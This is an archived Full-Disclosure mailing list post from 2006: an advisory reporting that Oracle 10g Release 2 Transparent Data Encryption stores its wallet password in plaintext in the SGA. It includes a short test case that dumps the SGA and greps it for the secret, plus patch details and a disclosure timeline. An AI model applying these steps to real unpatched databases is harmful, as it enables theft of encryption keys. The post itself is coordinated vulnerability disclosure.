[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Oracle Database 10g Rel. 2- Transparent Data Encryption plaintext masterkey in SGA

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Oracle Database 10g Rel. 2- Transparent Data Encryption plaintext masterkey in SGA
From: "Kornbrust, Alexander" <ak@xxxxxxxxxxxxxxxxxxxxxxxxx>
Date: Tue, 17 Jan 2006 21:32:55 +0100

Hello FD reader

Oracle released the first critical patch update for 2006 with bugfixes for 82 
vulnerabilities.
http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html 

Additional information concerning the Oracle January 2006 CPU is available here
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html



The following URL contains information about the unencrypted TDE masterkey 
stored in the SGA
http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html

#########################################################################
Transparent Data Encryption stores key unencrypted in the SGA

Name        Transparent Data Encryption stores key unencrypted in the SGA
Affected        Oracle Database 10g Release 2
Severity        High Risk
Category        Information disclosure
Vendor URL      http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Date          17 January 2005 (V 1.00)
Oracle Bug      5802173
Time to fix 190 days


Details
The Oracle security feature "Transparent Data Encryption" is storing the 
masterkey unencrypted in the SGA. A skilled attacker or non-security DBA can 
retrieve the plaintext masterkey.

Test case

SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";

System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 
Production With the Partitioning, OLAP and Data Mining options


[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin

[oracle@ora10201 /]$ cd /tmp

[oracle@ora10201 /]$ dumpsga 

[oracle@ora10201 /]$ strings * | grep -iH secretpassword 

secretpassword 
secretpassword 
secretpassword


[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-

^@^@0êd$L4^L¿^Xp 
/¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[]


Patch Information
Oracle fixed this issue with the patches from the critical patch update january 
2006 for Oracle 10g Release 2.

History
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 
(CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory



© 2006 by Red-Database-Security GmbH 
http://www.red-database-security.com 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] PC Firewall Choices
Next by Date: [Full-disclosure] Oracle DBMS - Access Control Bypass in Login
Previous by thread: [Full-disclosure] Reverse Engineering WMF Exploit Code
Next by thread: [Full-disclosure] Oracle DBMS - Access Control Bypass in Login
Index(es):
- Date
- Thread